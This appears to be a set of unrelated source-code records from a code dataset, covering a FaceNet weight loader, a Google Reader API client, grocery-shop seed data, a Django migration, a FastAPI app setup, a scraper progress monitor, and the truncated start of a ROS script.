    'inception_3a_5x5_conv1', 'inception_3a_5x5_conv2', 'inception_3a_5x5_bn1', 'inception_3a_5x5_bn2',
    'inception_3a_3x3_conv1', 'inception_3a_3x3_conv2', 'inception_3a_3x3_bn1', 'inception_3a_3x3_bn2',
    'inception_3b_3x3_conv1', 'inception_3b_3x3_conv2', 'inception_3b_3x3_bn1', 'inception_3b_3x3_bn2',
    'inception_3b_5x5_conv1', 'inception_3b_5x5_conv2', 'inception_3b_5x5_bn1', 'inception_3b_5x5_bn2',
    'inception_3b_pool_conv', 'inception_3b_pool_bn',
    'inception_3b_1x1_conv', 'inception_3b_1x1_bn',
    'inception_3c_3x3_conv1', 'inception_3c_3x3_conv2', 'inception_3c_3x3_bn1', 'inception_3c_3x3_bn2',
    'inception_3c_5x5_conv1', 'inception_3c_5x5_conv2', 'inception_3c_5x5_bn1', 'inception_3c_5x5_bn2',
    'inception_4a_3x3_conv1', 'inception_4a_3x3_conv2', 'inception_4a_3x3_bn1', 'inception_4a_3x3_bn2',
    'inception_4a_5x5_conv1', 'inception_4a_5x5_conv2', 'inception_4a_5x5_bn1', 'inception_4a_5x5_bn2',
    'inception_4a_pool_conv', 'inception_4a_pool_bn',
    'inception_4a_1x1_conv', 'inception_4a_1x1_bn',
    'inception_4e_3x3_conv1', 'inception_4e_3x3_conv2', 'inception_4e_3x3_bn1', 'inception_4e_3x3_bn2',
    'inception_4e_5x5_conv1', 'inception_4e_5x5_conv2', 'inception_4e_5x5_bn1', 'inception_4e_5x5_bn2',
    'inception_5a_3x3_conv1', 'inception_5a_3x3_conv2', 'inception_5a_3x3_bn1', 'inception_5a_3x3_bn2',
    'inception_5a_pool_conv', 'inception_5a_pool_bn',
    'inception_5a_1x1_conv', 'inception_5a_1x1_bn',
    'inception_5b_3x3_conv1', 'inception_5b_3x3_conv2', 'inception_5b_3x3_bn1', 'inception_5b_3x3_bn2',
    'inception_5b_pool_conv', 'inception_5b_pool_bn',
    'inception_5b_1x1_conv', 'inception_5b_1x1_bn',
    'dense_layer'
]

# Target shape (out_channels, in_channels, h, w) for each conv layer's
# flat CSV weights before transposing to Keras' (h, w, in, out) layout.
conv_shape = {
    'conv1': [64, 3, 7, 7],
    'conv2': [64, 64, 1, 1],
    'conv3': [192, 64, 3, 3],
    'inception_3a_1x1_conv': [64, 192, 1, 1],
    'inception_3a_pool_conv': [32, 192, 1, 1],
    'inception_3a_5x5_conv1': [16, 192, 1, 1],
    'inception_3a_5x5_conv2': [32, 16, 5, 5],
    'inception_3a_3x3_conv1': [96, 192, 1, 1],
    'inception_3a_3x3_conv2': [128, 96, 3, 3],
    'inception_3b_3x3_conv1': [96, 256, 1, 1],
    'inception_3b_3x3_conv2': [128, 96, 3, 3],
    'inception_3b_5x5_conv1': [32, 256, 1, 1],
    'inception_3b_5x5_conv2': [64, 32, 5, 5],
    'inception_3b_pool_conv': [64, 256, 1, 1],
    'inception_3b_1x1_conv': [64, 256, 1, 1],
    'inception_3c_3x3_conv1': [128, 320, 1, 1],
    'inception_3c_3x3_conv2': [256, 128, 3, 3],
    'inception_3c_5x5_conv1': [32, 320, 1, 1],
    'inception_3c_5x5_conv2': [64, 32, 5, 5],
    'inception_4a_3x3_conv1': [96, 640, 1, 1],
    'inception_4a_3x3_conv2': [192, 96, 3, 3],
    'inception_4a_5x5_conv1': [32, 640, 1, 1,],
    'inception_4a_5x5_conv2': [64, 32, 5, 5],
    'inception_4a_pool_conv': [128, 640, 1, 1],
    'inception_4a_1x1_conv': [256, 640, 1, 1],
    'inception_4e_3x3_conv1': [160, 640, 1, 1],
    'inception_4e_3x3_conv2': [256, 160, 3, 3],
    'inception_4e_5x5_conv1': [64, 640, 1, 1],
    'inception_4e_5x5_conv2': [128, 64, 5, 5],
    'inception_5a_3x3_conv1': [96, 1024, 1, 1],
    'inception_5a_3x3_conv2': [384, 96, 3, 3],
    'inception_5a_pool_conv': [96, 1024, 1, 1],
    'inception_5a_1x1_conv': [256, 1024, 1, 1],
    'inception_5b_3x3_conv1': [96, 736, 1, 1],
    'inception_5b_3x3_conv2': [384, 96, 3, 3],
    'inception_5b_pool_conv': [96, 736, 1, 1],
    'inception_5b_1x1_conv': [256, 736, 1, 1],
}
def load_weights_from_FaceNet(FRmodel):
    """Load OpenFace-exported CSV weights into the named layers of FRmodel."""
    # Load weights from csv files (which was exported from Openface torch model)
    weights = WEIGHTS
    weights_dict = load_weights()

    # Set layer weights of the model
    for name in weights:
        if FRmodel.get_layer(name) != None:
            FRmodel.get_layer(name).set_weights(weights_dict[name])
        elif model.get_layer(name) != None:
            # NOTE(review): `model` is not defined in this module — this
            # branch would raise NameError if ever reached. Confirm intent.
            model.get_layer(name).set_weights(weights_dict[name])
def load_weights():
    """Read all CSV weight files under ./weights into a name -> arrays dict.

    Conv layers yield [kernel (h, w, in, out), bias]; batch-norm layers
    yield [gamma, beta, mean, variance]; the dense layer yields
    [weights (736, 128), bias].
    """
    # Set weights path
    dirPath = './weights'
    fileNames = filter(lambda f: not f.startswith('.'), os.listdir(dirPath))
    paths = {}
    weights_dict = {}

    # Map 'layer_suffix' -> full CSV path (suffixes: _w, _b, _m, _v).
    for n in fileNames:
        paths[n.replace('.csv', '')] = dirPath + '/' + n

    for name in WEIGHTS:
        if 'conv' in name:
            conv_w = genfromtxt(paths[name + '_w'], delimiter=',', dtype=None)
            conv_w = np.reshape(conv_w, conv_shape[name])
            # Torch (out, in, h, w) -> Keras (h, w, in, out).
            conv_w = np.transpose(conv_w, (2, 3, 1, 0))
            conv_b = genfromtxt(paths[name + '_b'], delimiter=',', dtype=None)
            weights_dict[name] = [conv_w, conv_b]
        elif 'bn' in name:
            bn_w = genfromtxt(paths[name + '_w'], delimiter=',', dtype=None)
            bn_b = genfromtxt(paths[name + '_b'], delimiter=',', dtype=None)
            bn_m = genfromtxt(paths[name + '_m'], delimiter=',', dtype=None)
            bn_v = genfromtxt(paths[name + '_v'], delimiter=',', dtype=None)
            weights_dict[name] = [bn_w, bn_b, bn_m, bn_v]
        elif 'dense' in name:
            dense_w = genfromtxt(dirPath+'/dense_w.csv', delimiter=',', dtype=None)
            dense_w = np.reshape(dense_w, (128, 736))
            dense_w = np.transpose(dense_w, (1, 0))
            dense_b = genfromtxt(dirPath+'/dense_b.csv', delimiter=',', dtype=None)
            weights_dict[name] = [dense_w, dense_b]

    return weights_dict
def load_dataset():
    """Load the 'happy' train/test sets from HDF5.

    Returns (train_x, train_y, test_x, test_y, classes); labels are
    reshaped to row vectors of shape (1, m).
    """
    train_dataset = h5py.File('datasets/train_happy.h5', "r")
    train_set_x_orig = np.array(train_dataset["train_set_x"][:]) # your train set features
    train_set_y_orig = np.array(train_dataset["train_set_y"][:]) # your train set labels

    test_dataset = h5py.File('datasets/test_happy.h5', "r")
    test_set_x_orig = np.array(test_dataset["test_set_x"][:]) # your test set features
    test_set_y_orig = np.array(test_dataset["test_set_y"][:]) # your test set labels

    classes = np.array(test_dataset["list_classes"][:]) # the list of classes

    train_set_y_orig = train_set_y_orig.reshape((1, train_set_y_orig.shape[0]))
    test_set_y_orig = test_set_y_orig.reshape((1, test_set_y_orig.shape[0]))
    return train_set_x_orig, train_set_y_orig, test_set_x_orig, test_set_y_orig, classes
def img_to_encoding(image_path, model):
    """Compute the face embedding of an image file with the given model."""
    img1 = cv2.imread(image_path, 1)
    # BGR (OpenCV default) -> RGB.
    img = img1[...,::-1]
    # HWC -> CHW, scaled to [0, 1]; rounding keeps encodings reproducible.
    img = np.around(np.transpose(img, (2,0,1))/255.0, decimals=12)
    x_train = np.array([img])
    embedding = model.predict_on_batch(x_train)
    return embedding
"noreply@github.com"
] | bhanupratapmall.noreply@github.com |
74f064296992ab3766c2c33c72a4130e22c3ea1d | 244351fa728637ccf5d68fa079d1a3e23c7de1e1 | /lib/reader.py | bd18f886f3e1edcb30da01bf4e93f820d829fe3d | [] | no_license | tonicbupt/job | a2d86b1e756b0d97e08dad544890dc54c5330750 | b5c7d19abe243d9dd6b05f309c352bf4891e1f4c | refs/heads/master | 2021-01-16T22:49:10.287609 | 2013-05-10T10:38:57 | 2013-05-10T14:16:52 | 9,370,802 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,205 | py | import logging
from time import time
from urllib import urlencode, quote_plus
from urllib2 import urlopen, Request
# Google Reader API endpoints (service retired in 2013; kept for reference).
LOGIN_URL = 'https://www.google.com/accounts/ClientLogin'
TOKEN_URL = 'https://www.google.com/reader/api/0/token'
SUBSCRIBE_URL = 'https://www.google.com/reader/api/0/subscription/quickadd?output=json'
FEED_URL = 'https://www.google.com/reader/atom/feed'

logger = logging.getLogger(__name__)
class GoogleReader(object):
    """Minimal Google Reader client built on the legacy ClientLogin flow.

    Typical usage: call login() first to obtain the auth value; afterwards
    subscribe() / get_feed() can be used (subscribe() fetches an action
    token on demand via get_token()).
    """

    def __init__(self, email, passwd):
        self.email = email
        self.passwd = passwd

    def login(self):
        """Authenticate via ClientLogin and store the auth value on self.

        Returns True on success, False on any failure.
        """
        request = Request(LOGIN_URL, urlencode({
            'service': 'reader',
            'Email': self.email,
            'Passwd': self.passwd,
            'source': 'xiaomenco'
        }))
        try:
            f = urlopen(request, timeout=5)
            lines = f.read().split()
            # The third line looks like "Auth=<value>"; strip the "Auth=" prefix.
            self.auth = lines[2][5:]
        except Exception:  # narrowed from bare except: don't swallow SystemExit/KeyboardInterrupt
            logger.info('login to GoogleReader fail')
            return False
        return True

    def get_token(self):
        """Fetch a short-lived action token; returns None on failure."""
        headers = {'Authorization': 'GoogleLogin auth=' + self.auth}
        request = Request(TOKEN_URL, headers=headers)
        try:
            f = urlopen(request, timeout=5)
            token = f.read()
            self.token = token
        except Exception:  # narrowed from bare except
            logger.info('get token error.')
            return None
        return token

    def subscribe(self, feed):
        """Subscribe the logged-in account to *feed*.

        Returns the raw JSON response body, or None on failure.
        """
        headers = {'Authorization': 'GoogleLogin auth=' + self.auth}
        request = Request(SUBSCRIBE_URL, urlencode({
            'quickadd': feed,
            'T': self.get_token()}), headers=headers)
        try:
            f = urlopen(request, timeout=5)
            return f.read()
        except Exception:  # narrowed from bare except
            logger.info('subscribe %s error' % feed)
            return None

    def get_feed(self, feed, num=100):
        """Fetch up to *num* entries of *feed* as an Atom document.

        Returns the raw response body, or None on failure.
        """
        headers = {'Authorization': 'GoogleLogin auth=' + self.auth}
        request = Request(FEED_URL +
                          quote_plus('/' + feed) +
                          '?n=%d' % num, headers=headers)
        try:
            f = urlopen(request, timeout=10)
            return f.read()
        except Exception:  # narrowed from bare except
            logger.info('get feed %s error' % feed)
            return None
| [
"luoruici@gmail.com"
] | luoruici@gmail.com |
e5e74bb27ddcfe5e7ca2a7c60497d32bee026cdd | 3aac637c59acc0427fa047212ad601f30760ecc4 | /add_goods/goods.py | 61fa63baaa202929ceb234185a2ddb7c47089216 | [] | no_license | hzlpypy/fruit_item | c684d934f3e8da97445431e8ef0bcbfcef4152b0 | 103a95c0ddc9488815701e99a37d418a552d2402 | refs/heads/master | 2022-12-12T03:21:21.133021 | 2018-07-22T15:28:47 | 2018-07-22T15:28:47 | 137,031,362 | 2 | 1 | null | 2022-11-22T02:34:23 | 2018-06-12T07:07:56 | Python | UTF-8 | Python | false | false | 19,956 | py | # -*- coding: utf-8 -*-
__author__ = 'hzl'
__date__ = '202018/7/11 22:31'
row_data = [
{
"id": 1,
"title": "新鲜水果",
"judgefruit": "model01",
"banner": "banner/2018/06/banner01.jpg",
"createtime": "20180609 031700",
"isDelete": "1",
"fruit": [
{
"id": 1,
"gid_id": 1,
"gtitle": "草莓",
"gtype": "时令水果",
"gprice": "30.00",
"gimg": "uploads/2018/06/goods003.jpg",
"ginfo": "草莓浆果柔软多汁,味美爽口,适合速冻保鲜贮藏。草莓速冻后,可以保持原有的色、香、味,既便于贮藏,又便于外销。",
"gdetailed": "<p>草莓采摘园位于北京大兴区 庞各庄镇四各庄村 ,每年1月-6月面向北京以及周围城市提供新鲜草莓采摘和精品礼盒装草莓,草莓品种多样丰富,个大香甜。所有草莓均严格按照有机标准培育,不使用任何化肥和农药。草莓在采摘期间免洗可以直接食用。欢迎喜欢草莓的市民前来采摘,也欢迎各大单位选购精品有机草莓礼盒,有机草莓礼盒是亲朋馈赠、福利送礼的最佳选择。</p>",
"gcommon": "<p>感觉一般般啦</p>\r\n<p>还没自己种的好吃</p>\r\n<p>超级棒的</p>\r\n<p>哟哦哦哦哦哦哦</p>",
"gsalesvolume": 30,
"gevaluate": "真的好吃",
"addtime": "20180609 ",
"a_updatetime": "20180609 031900",
"isDelete": "1"
},
{
"id": 2,
"gid_id": 1,
"gtitle": "葡萄",
"gtype": "时令水果",
"gprice": "14.11",
"gimg": "uploads/2018/06/goods002.jpg",
"ginfo": "精选召唤师峡谷红BUFF葡萄",
"gdetailed": "<p>鲜嫩可口.入口即化,真的好吃</p>",
"gcommon": "<p>假葡萄</p>\r\n<p>塑料葡萄</p>\r\n<p>超级难吃</p>",
"gsalesvolume": 21,
"gevaluate": "好吃个P",
"addtime": "20180609 ",
"a_updatetime": "20180609 032000",
"isDelete": "1"
},
{
"id": 3,
"gid_id": 1,
"gtitle": "柠檬",
"gtype": "时令水果",
"gprice": "15.11",
"gimg": "uploads/2018/06/goods001.jpg",
"ginfo": "1",
"gdetailed": "<p>ID分开来放大后可获得法律和的方式来回复带回来的方式离开的身份号莲富大厦良好</p>",
"gcommon": "<p>假的吧</p>\r\n<p>真TM酸</p>\r\n<p>吃个蛋</p>\r\n<p>全是坏的</p>\r\n<p>千万不要买</p>",
"gsalesvolume": 54,
"gevaluate": "1",
"addtime": "20180609 ",
"a_updatetime": "20180609 032000",
"isDelete": "1"
},
{
"id": 4,
"gid_id": 1,
"gtitle": "奇异果",
"gtype": "时令水果",
"gprice": "25.80",
"gimg": "uploads/2018/06/goods012.jpg",
"ginfo": "1",
"gdetailed": "1",
"gcommon": null,
"gsalesvolume": 24,
"gevaluate": "1",
"addtime": "20180609 ",
"a_updatetime": "20180609 032100",
"isDelete": "1"
}
],
"classify": [
{
"id": 1,
"sid_id": 1,
"infoname": "鲜芒",
"create_time": "20180609 093000",
"is_delete": "1"
},
{
"id": 2,
"sid_id": 1,
"infoname": "加州提子",
"create_time": "20180609 093000",
"is_delete": "1"
},
{
"id": 3,
"sid_id": 1,
"infoname": "亚马逊牛油果",
"create_time": "20180609 093100",
"is_delete": "1"
}
]
},
{
"id": 2,
"title": "海鲜产品",
"judgefruit": "model02",
"banner": "banner/2018/06/banner02.jpg",
"createtime": "20180609 031700",
"isDelete": "1",
"fruit": [
{
"id": 5,
"gid_id": 2,
"gtitle": "青岛野生海捕大青虾",
"gtype": "海鲜盛宴",
"gprice": "48.00",
"gimg": "uploads/2018/06/goods018.jpg",
"ginfo": "1",
"gdetailed": "1",
"gcommon": null,
"gsalesvolume": 33,
"gevaluate": "1",
"addtime": "20180609 ",
"a_updatetime": "20180609 032100",
"isDelete": "1"
},
{
"id": 6,
"gid_id": 2,
"gtitle": "扇贝",
"gtype": "海鲜盛宴",
"gprice": "46.00",
"gimg": "uploads/2018/06/goods019.jpg",
"ginfo": "1",
"gdetailed": "1",
"gcommon": null,
"gsalesvolume": 41,
"gevaluate": "1",
"addtime": "20180609 ",
"a_updatetime": "20180609 032200",
"isDelete": "1"
},
{
"id": 7,
"gid_id": 2,
"gtitle": "冷冻秋刀鱼",
"gtype": "海鲜盛宴",
"gprice": "19.00",
"gimg": "uploads/2018/06/goods020.jpg",
"ginfo": "1",
"gdetailed": "1",
"gcommon": null,
"gsalesvolume": 52,
"gevaluate": "1",
"addtime": "20180609 ",
"a_updatetime": "20180609 032200",
"isDelete": "1"
},
{
"id": 8,
"gid_id": 2,
"gtitle": "基围虾",
"gtype": "海鲜盛宴",
"gprice": "25.00",
"gimg": "uploads/2018/06/goods021.jpg",
"ginfo": "1",
"gdetailed": "1",
"gcommon": null,
"gsalesvolume": 84,
"gevaluate": "1",
"addtime": "20180609 ",
"a_updatetime": "20180609 032200",
"isDelete": "1"
}
],
"classify": [
{
"id": 4,
"sid_id": 2,
"infoname": "河虾",
"create_time": "20180609 093100",
"is_delete": "1"
},
{
"id": 5,
"sid_id": 2,
"infoname": "扇贝",
"create_time": "20180609 093100",
"is_delete": "1"
}
]
},
{
"id": 3,
"title": "猪牛羊肉",
"judgefruit": "model03",
"banner": "banner/2018/06/banner03.jpg",
"createtime": "20180609 031800",
"isDelete": "1",
"fruit": [
{
"id": 9,
"gid_id": 3,
"gtitle": "大肥肉",
"gtype": "新鲜特供",
"gprice": "38.00",
"gimg": "uploads/2018/06/goods013.jpg",
"ginfo": "1",
"gdetailed": "1",
"gcommon": null,
"gsalesvolume": 24,
"gevaluate": "1",
"addtime": "20180609 ",
"a_updatetime": "20180609 032300",
"isDelete": "1"
},
{
"id": 10,
"gid_id": 3,
"gtitle": "小肥肉",
"gtype": "新鲜特供",
"gprice": "24.00",
"gimg": "uploads/2018/06/goods002_kpZtUs0.jpg",
"ginfo": "1",
"gdetailed": "1",
"gcommon": null,
"gsalesvolume": 12,
"gevaluate": "1",
"addtime": "20180609 ",
"a_updatetime": "20180609 032400",
"isDelete": "1"
},
{
"id": 11,
"gid_id": 3,
"gtitle": "全都是肥柚",
"gtype": "新鲜特供",
"gprice": "45.00",
"gimg": "uploads/2018/06/goods009.jpg",
"ginfo": "1",
"gdetailed": "1",
"gcommon": null,
"gsalesvolume": 15,
"gevaluate": "1",
"addtime": "20180609 ",
"a_updatetime": "20180609 032400",
"isDelete": "1"
},
{
"id": 12,
"gid_id": 3,
"gtitle": "小鲜肉",
"gtype": "新鲜特供",
"gprice": "1.00",
"gimg": "uploads/2018/06/goods006_x6DhaaZ.jpg",
"ginfo": "1",
"gdetailed": "1",
"gcommon": null,
"gsalesvolume": 8,
"gevaluate": "1",
"addtime": "20180609 ",
"a_updatetime": "20180609 032400",
"isDelete": "1"
},
{
"id": 13,
"gid_id": 3,
"gtitle": "老肥柚",
"gtype": "新鲜特供",
"gprice": "88.00",
"gimg": "uploads/2018/06/goods001_wWUBBCC.jpg",
"ginfo": "1",
"gdetailed": "1",
"gcommon": null,
"gsalesvolume": 77,
"gevaluate": "1",
"addtime": "20180609 ",
"a_updatetime": "20180609 032500",
"isDelete": "1"
}
],
"classify": [
{
"id": 6,
"sid_id": 3,
"infoname": "猪肉",
"create_time": "20180609 093100",
"is_delete": "1"
},
{
"id": 7,
"sid_id": 3,
"infoname": "牛肉",
"create_time": "20180609 093100",
"is_delete": "1"
},
{
"id": 8,
"sid_id": 3,
"infoname": "羊肉",
"create_time": "20180609 093100",
"is_delete": "1"
}
]
},
{
"id": 4,
"title": "禽类食品",
"judgefruit": "model04",
"banner": "banner/2018/06/banner04.jpg",
"createtime": "20180609 031800",
"isDelete": "1",
"fruit": [
{
"id": 14,
"gid_id": 4,
"gtitle": "小鸡蛋",
"gtype": "原地出产",
"gprice": "22.00",
"gimg": "uploads/2018/06/goods006.jpg",
"ginfo": "1",
"gdetailed": "1",
"gcommon": null,
"gsalesvolume": 62,
"gevaluate": "1",
"addtime": "20180609 ",
"a_updatetime": "20180609 032500",
"isDelete": "1"
},
{
"id": 15,
"gid_id": 4,
"gtitle": "大鹅蛋",
"gtype": "原地出产",
"gprice": "11.00",
"gimg": "uploads/2018/06/goods004.jpg",
"ginfo": "1",
"gdetailed": "1",
"gcommon": null,
"gsalesvolume": 258,
"gevaluate": "1",
"addtime": "20180609 ",
"a_updatetime": "20180609 032700",
"isDelete": "1"
},
{
"id": 16,
"gid_id": 4,
"gtitle": "高邮咸鸭蛋",
"gtype": "原地出产",
"gprice": "15.21",
"gimg": "uploads/2018/06/goods006_XJVNYkB.jpg",
"ginfo": "1",
"gdetailed": "1",
"gcommon": null,
"gsalesvolume": 424,
"gevaluate": "1",
"addtime": "20180609 ",
"a_updatetime": "20180609 032900",
"isDelete": "1"
},
{
"id": 17,
"gid_id": 4,
"gtitle": "虎皮蛋",
"gtype": "原地出产",
"gprice": "25.83",
"gimg": "uploads/2018/06/goods003_mo3wCLB.jpg",
"ginfo": "1",
"gdetailed": "<p>1</p>",
"gcommon": null,
"gsalesvolume": 365,
"gevaluate": "1",
"addtime": "20180609 ",
"a_updatetime": "20180609 033000",
"isDelete": "1"
}
],
"classify": [
{
"id": 9,
"sid_id": 4,
"infoname": "鸡蛋",
"create_time": "20180609 093200",
"is_delete": "1"
},
{
"id": 10,
"sid_id": 4,
"infoname": "鸭蛋",
"create_time": "20180609 093200",
"is_delete": "1"
}
]
},
{
"id": 5,
"title": "新鲜蔬菜",
"judgefruit": "model05",
"banner": "banner/2018/06/banner05.jpg",
"createtime": "20180609 031800",
"isDelete": "1",
"fruit": [
{
"id": 18,
"gid_id": 5,
"gtitle": "小白菜",
"gtype": "绿色有机",
"gprice": "12.19",
"gimg": "uploads/2018/06/goods001_QMqCXg1.jpg",
"ginfo": "1",
"gdetailed": "<p>1</p>",
"gcommon": null,
"gsalesvolume": 87,
"gevaluate": "1",
"addtime": "20180609 ",
"a_updatetime": "20180609 033000",
"isDelete": "1"
},
{
"id": 19,
"gid_id": 5,
"gtitle": "大白菜",
"gtype": "绿色有机",
"gprice": "22.30",
"gimg": "uploads/2018/06/goods005.jpg",
"ginfo": "1",
"gdetailed": "<p>1</p>",
"gcommon": null,
"gsalesvolume": 274,
"gevaluate": "1",
"addtime": "20180609 ",
"a_updatetime": "20180609 033100",
"isDelete": "1"
},
{
"id": 20,
"gid_id": 5,
"gtitle": "小菠菜",
"gtype": "绿色有机",
"gprice": "14.14",
"gimg": "uploads/2018/06/goods006_VdcpgNq.jpg",
"ginfo": "1",
"gdetailed": "<p>1</p>",
"gcommon": null,
"gsalesvolume": 255,
"gevaluate": "1",
"addtime": "20180609 ",
"a_updatetime": "20180609 033100",
"isDelete": "1"
},
{
"id": 21,
"gid_id": 5,
"gtitle": "大菠菜",
"gtype": "绿色有机",
"gprice": "15.66",
"gimg": "uploads/2018/06/goods005_U6YcfAV.jpg",
"ginfo": "1",
"gdetailed": "<p>1</p>",
"gcommon": null,
"gsalesvolume": 354,
"gevaluate": "1",
"addtime": "20180609 ",
"a_updatetime": "20180609 033100",
"isDelete": "1"
}
],
"classify": [
{
"id": 11,
"sid_id": 5,
"infoname": "进口大白菜",
"create_time": "20180609 093200",
"is_delete": "1"
},
{
"id": 12,
"sid_id": 5,
"infoname": "非洲白菜",
"create_time": "20180609 093200",
"is_delete": "1"
}
]
},
{
"id": 6,
"title": "速冻食品",
"judgefruit": "model06",
"banner": "banner/2018/06/banner06.jpg",
"createtime": "20180609 031800",
"isDelete": "1",
"fruit": [
{
"id": 25,
"gid_id": 6,
"gtitle": "冻冬瓜",
"gtype": "酷爽冰品",
"gprice": "17.88",
"gimg": "uploads/2018/06/QQ截图20180609162721_OENEYjK.jpg",
"ginfo": "疏忽或或或或或",
"gdetailed": "<p>发的发送到发送到</p>",
"gcommon": "<p>感觉还不错,挺新鲜</p>\r\n<p>还可以吧</p>\r\n<p>超级好吃</p>\r\n<p>真的好吃</p>",
"gsalesvolume": 555,
"gevaluate": "垃圾",
"addtime": "20180621 ",
"a_updatetime": "20180621 093000",
"isDelete": "1"
},
{
"id": 22,
"gid_id": 6,
"gtitle": "速冻鱼肉",
"gtype": "酷爽冰品",
"gprice": "48.00",
"gimg": "uploads/2018/06/u42799109431372834422fm27gp0.jpg",
"ginfo": "1",
"gdetailed": "<p>1</p>",
"gcommon": null,
"gsalesvolume": 154,
"gevaluate": "1",
"addtime": "20180609 ",
"a_updatetime": "20180609 033200",
"isDelete": "1"
},
{
"id": 23,
"gid_id": 6,
"gtitle": "冻草莓",
"gtype": "酷爽冰品",
"gprice": "25.80",
"gimg": "uploads/2018/06/goods02.jpg",
"ginfo": "1",
"gdetailed": "<p>1</p>",
"gcommon": null,
"gsalesvolume": 247,
"gevaluate": "1",
"addtime": "20180609 ",
"a_updatetime": "20180609 033200",
"isDelete": "1"
},
{
"id": 24,
"gid_id": 6,
"gtitle": "冻西瓜",
"gtype": "酷爽冰品",
"gprice": "48.00",
"gimg": "uploads/2018/06/QQ截图20180609162639.jpg",
"ginfo": "1",
"gdetailed": "<p>55454545</p>",
"gcommon": null,
"gsalesvolume": 147,
"gevaluate": "1",
"addtime": "20180609 ",
"a_updatetime": "20180609 033400",
"isDelete": "1"
}
],
"classify": [
{
"id": 13,
"sid_id": 6,
"infoname": "棒棒冰",
"create_time": "20180609 093200",
"is_delete": "1"
},
{
"id": 14,
"sid_id": 6,
"infoname": "雪糕",
"create_time": "20180609 093300",
"is_delete": "1"
},
{
"id": 15,
"sid_id": 6,
"infoname": "皮雪糕",
"create_time": "20180609 093300",
"is_delete": "1"
}
]
}
] | [
"1761784585@qq.com"
] | 1761784585@qq.com |
affdfdca4df458dc05df4ffdb2bae1a067555c0c | 494292f45ede093c587210cead4930f585850610 | /mblog/mainsite/migrations/0005_post_price.py | 77052b5e96700f344f59421cbc39e4e72c2c840d | [] | no_license | 22836252/myfirstdjungo | a3af559c6cf46d1efef2e3e48fb535d11e96fe1b | 92d47f2f00cb97bbb5125a7f92de85b54ef2578e | refs/heads/master | 2021-09-24T09:54:04.394797 | 2020-02-19T11:26:55 | 2020-02-19T11:26:55 | 241,576,657 | 0 | 0 | null | 2021-09-22T18:36:02 | 2020-02-19T09:03:27 | HTML | UTF-8 | Python | false | false | 409 | py | # Generated by Django 3.0.3 on 2020-02-19 08:38
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated Django migration: add ``price`` to ``mainsite.Post``."""

    dependencies = [
        ('mainsite', '0004_post_abstract'),
    ]

    operations = [
        migrations.AddField(
            model_name='post',
            name='price',
            # DecimalField keeps monetary values exact; default=0 backfills existing rows.
            field=models.DecimalField(decimal_places=2, default=0, max_digits=16),
        ),
    ]
| [
"ken99899@gmail.com"
] | ken99899@gmail.com |
7e5c981732770ef9f5f9c5bda7000c85ed4abc84 | c0a968aed0abfe27970a0f0aac25905bedf9d794 | /main.py | 72cb13f3943793804f7a760764788a39652d8bdb | [
"MIT"
] | permissive | MikeTovar13/habi-back | b3181527284dae19725346f8d2fa15215c2ff40d | 724416f8675dde8cef4fe90b6a3e8fc5bbf3b706 | refs/heads/master | 2023-05-12T05:54:18.241539 | 2021-06-08T01:47:38 | 2021-06-08T01:47:38 | 374,259,800 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 745 | py | from fastapi import FastAPI
import uvicorn
from routes.v1.inmuebles import inmueblesApp
from routes.v1.propietario import propietarioApp
from routes.v1.utils import utilsApp
from fastapi.middleware.cors import CORSMiddleware
# Service routers: mount each API module under its versioned prefix.
app = FastAPI(title="Habi Backend", version="1.0.0")
app.include_router(inmueblesApp, prefix="/v1/inmueble")
app.include_router(propietarioApp, prefix="/v1/propietario")
app.include_router(utilsApp, prefix="/v1/utils")

# CORS: allow any origin.
# NOTE(review): wildcard origins together with allow_credentials=True is a
# combination browsers reject for credentialed requests -- confirm intent.
origins = ["*"]
app.add_middleware(
    CORSMiddleware,
    allow_origins=origins,
    allow_credentials=True,
    allow_methods=["*"],
    allow_headers=["*"],
)

# Script entry point: serve on all interfaces, port 8080.
if __name__ == "__main__":
    uvicorn.run(app, host="0.0.0.0", port=8080)
| [
"ferney.tovar13@gmail.com"
] | ferney.tovar13@gmail.com |
4724ac93de9f54661e9f2dc8f537ce5ca3865711 | c9670c1e205fe341d70d77098195880c86026fe3 | /sec_dl/utils/monitor_scraper_progress.py | 48cbb7b80d7692319a9cb6b9ca25b3ac136513ad | [
"MIT"
] | permissive | Peppershaker/sec_dl | 09698cdebba5249ed1da79deb0daa69982b71d91 | 30f0176409c8189fa223637e9734904d8ac94001 | refs/heads/master | 2023-05-25T01:13:04.396579 | 2019-07-03T16:59:00 | 2019-07-03T16:59:00 | 194,985,731 | 0 | 0 | null | 2023-05-22T22:29:17 | 2019-07-03T05:31:17 | Python | UTF-8 | Python | false | false | 1,047 | py | import time
from scrape_all_filings import connect_db
from datetime import datetime
def get_rows_left():
    """Return how many filings rows still have no scraped text."""
    pending = session.query(filings.c.filing_id, filings.c.path)
    # `== None` is intentional: SQLAlchemy renders it as SQL "IS NULL".
    return pending.filter(filings.c.text == None).count()
# Open the database connection and snapshot the starting backlog so the
# first report can compute a completion rate.
engine, metadata, Session, session, connection, filings = connect_db()

start_time = datetime.now()
rows_left_at_start = get_rows_left()

print("Waiting to collect data")
time.sleep(10)  # let the scraper make some progress before the first estimate
if __name__ == "__main__":
while True:
current_time = datetime.now()
time_elapsed = current_time - start_time
rows_left = get_rows_left()
rows_completed_since_start = rows_left_at_start - rows_left
seconds_per_iteration = time_elapsed.seconds / rows_completed_since_start
mins_left = rows_left * seconds_per_iteration / 60
print("Update On {}".format(datetime.now()))
print("{} rows left, {:.2f} minutes to go".format(rows_left, mins_left ))
print()
start_time = current_time
rows_left_at_start = rows_left
time.sleep(5*60)
| [
"victor.c.xu@gmail.com"
] | victor.c.xu@gmail.com |
e87310d62a78bfd785c1e61cc00290c6081c3f3d | d75d07abd97b863344801c95ca776139eee5d7a9 | /src/sample/stopline_test.py | 8b76c7e6ae4c6c0f1dcc02c8ed2165467dde3468 | [] | no_license | kbs907/programmers_final_competition | f15be51f1039fc1026322c7d508195c4ac48abfb | d1f9e212358d23f3b5fe489eeddd18065b744921 | refs/heads/master | 2023-09-02T23:15:09.174036 | 2021-10-19T08:31:37 | 2021-10-19T08:31:37 | 400,005,766 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,018 | py | #! /usr/bin/env python
# -*- coding:utf-8 -*-
### 필요한 모듈 import ###
import rospy, rospkg, time, sys, os
import numpy as np
import cv2, random, math
from cv_bridge import CvBridge, CvBridgeError
